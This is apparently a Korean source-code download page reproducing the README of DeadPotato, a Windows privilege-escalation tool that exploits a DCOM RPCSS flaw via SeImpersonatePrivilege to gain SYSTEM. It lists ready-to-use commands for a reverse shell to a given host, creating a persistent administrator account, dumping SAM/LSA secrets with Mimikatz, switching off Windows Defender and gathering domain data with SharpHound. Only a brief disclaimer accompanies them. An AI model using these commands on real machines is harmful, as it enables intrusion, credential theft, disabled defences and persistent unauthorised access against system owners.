홈페이지>프로그래밍 관련>기타 소스코드
다운로드
데드포테이토
데드포테이토

QQ浏览器截图20241111131452.png


이제 Hashdump 및 SharpHound 모듈을 사용할 수 있습니다!

❗ 승인되지 않은 상황에서 이 프로그램을 사용하는 것은 엄격히 금지됩니다. DeadPotato의 작성자는 시스템에 발생한 피해에 대해 어떠한 책임도 지지 않습니다. 주의해서 사용하세요. ❗ 

C:Userslypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   |  _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITYSYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

빠른 시작 - 사용 방법

귀하의 컨텍스트에서 SeImpersonatePrivilege 권한이 활성화되어 있습니까? DeadPotato를 사용하면 로컬 시스템에서 최대 권한을 얻을 수 있습니다.

이 도구는 OXID를 처리할 때 DCOM의 RPCSS 결함을 악용하여 NT AUTHORITYSYSTEM 사용자의 컨텍스트에서 실행되는 상승된 프로세스를 시작하려고 시도하여 중요한 작업이 자유롭게 수행될 수 있도록 컴퓨터에 대한 무제한 액세스를 허용합니다.

다음 경우에는 -cmd 모듈이 사용됩니다. 상승된 역방향 쉘을 생성하기 위한 -rev IP:PORT , 지속성을 위한 새로운 로컬 관리자 생성을 위한 -newadmin usr:pass 또는 SAM 해시 덤프를 위한 -mimi sam 과 같은 많은 모듈을 사용할 수 있습니다.

353823526-b5f71f4a-f8bc-4099-81c5-54bcece7abb6.gif

SeImpersonatePrivilege 권한 확인

DeadPotato를 사용하려면 현재 컨텍스트에서 SeImpersonatePrivilege 권한을 활성화해야 합니다. 이를 확인하기 위해 whoami /priv 명령을 실행할 수 있습니다. 권한이 비활성화된 경우 현재 컨텍스트에서는 악용이 불가능합니다. 

C:Userslypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

높은 리버스 쉘 얻기

1731302107963065.gif

크레딧

이 프로젝트 "DeadPotato"는 BeichenDream의 명작 "GodPotato"의 소스 코드를 기반으로 구축된 도구입니다. 이 프로젝트가 마음에 든다면 원본 프로젝트에 대한 지지도 표시해 주세요.

BeichenDream, Benjamin DELPY gentilkiwi , BloodHound 개발자.

특허

이 프로젝트는 Apache 2.0 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 검토하세요.

확장하다
추가 정보
관련 애플리케이션
추천
관련 정보 전체
사용자 리뷰